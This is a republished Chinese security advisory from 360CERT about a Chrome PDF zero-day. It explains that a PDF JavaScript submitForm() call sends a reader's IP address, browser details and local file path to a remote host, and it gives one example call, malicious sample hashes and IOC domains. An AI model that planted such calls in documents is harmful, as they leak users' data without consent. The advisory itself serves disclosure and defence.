Chrome中通过打开pdf文件泄露信息0day预警

栏目: 编程工具 · 发布时间: 5年前

内容简介:北京时间2月28日,360CERT监控到edgepot.io发布的一篇博客公开披露了Chrome中通过打开pdf文件泄露信息的0day漏洞,漏洞成功利用可导致目标用户IP地址等信息被泄漏,已经出现多个利用该漏洞的野外样本。该漏洞危害较为严重,影响较大。漏洞的根源在于this.submitForm()这个PDF Javascript API。像this.submitForm(‘

Chrome中通过打开pdf文件泄露信息0day预警

0x00 漏洞背景

北京时间2月28日,360CERT监控到edgepot.io发布的一篇博客公开披露了Chrome中通过打开pdf文件泄露信息的0day漏洞,漏洞成功利用可导致目标用户IP地址等信息被泄漏,已经出现多个利用该漏洞的野外样本。该漏洞危害较为严重,影响较大。

0x01 漏洞详情

漏洞的根源在于this.submitForm()这个PDF Javascript API。像this.submitForm(‘ http://google.com/test ‘)这样一个简单的调用就会导致Chrome把个人信息发送到google.com。 可能被泄露的信息包括:

1.用户的公共IP地址。

2.操作系统,Chrome版本等(在HTTP POST header中)。

3.用户计算机上PDF文件的完整路径(在HTTP POST payload中)。

Chrome中通过打开pdf文件泄露信息0day预警

0x02 安全建议

虽然信息泄露漏洞并不能直接实现代码执行,但是仍然存在不小的危害。建议用户使用其它PDF阅读器在本地查看收到的PDF文档,直到Chrome修复此问题(Chrome称会在4月底修复),或者在Chrome中打开PDF文档时断开网络连接。

0x03 相关IOC

恶意样本:

2dd6ade4d0d4dc8224b28f8819b1c49bb7ae4025933e737ac8069c496d88bb43 286ed6d0261aed1115e06e2e8cf0af840297241e9dc9494a496a2c8b75457749 a21a4fcc75cd20a0965f1673b98c0dd688711c40cbabf92a5e5cd1f31a7ac684 1d151793f521419c1470079a37b1e37b8b59a5b69a5506f1d0dbee6f3995b25d 0c3e8efd667f7ff1549bfd2a4498105cb2607314d73b7105f4c1d747d7341090 fb56efe75f3b4509d5a2e0655536d9dab121798d92b8660121bd4691265a87e3 622624d6f161b7d2fa7859d46792dd6bb49024b432b04106b1818510a2037689 0cc1234c981806dd22e0e98e4be002e8df8d285b055e7f891ff8e91af59aee1e 2dd6ade4d0d4dc8224b28f8819b1c49bb7ae4025933e737ac8069c496d88bb43

域名:

readnotify.com

http://zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net

0x04 时间线

2019-02-26 edgepot.io博客文章发布

2019-02-28 360CERT发布预警

0x05 参考链接

  1. EdgeSpot detects PDF zero-day samples tracking users who use Google Chrome as local PDF viewer Summary

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

计算机程序设计艺术(第3卷 英文版·第2版)

计算机程序设计艺术(第3卷 英文版·第2版)

Donald E.Knuth / 人民邮电出版社 / 2010-10 / 119.00元

《计算机程序设计艺术》系列被公认为计算机科学领域的权威之作,深入阐述了程序设计理论,对计算机领域的发展有着极为深远的影响。本书是该系列的第3卷,扩展了第1卷中信息结构的内容,主要讲排序和查找。书中对排序和查找算法进行了详细的介绍,并对各种算法的效率做了大量的分析。 本书适合从事计算机科学、计算数学等各方面工作的人员阅读,也适合高等院校相关专业的师生作为教学参考书,对于想深入理解计算机算法的读......一起来看看 《计算机程序设计艺术(第3卷 英文版·第2版)》 这本书的介绍吧!

Base64 编码/解码
Base64 编码/解码

Base64 编码/解码

XML、JSON 在线转换
XML、JSON 在线转换

在线XML、JSON转换工具

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具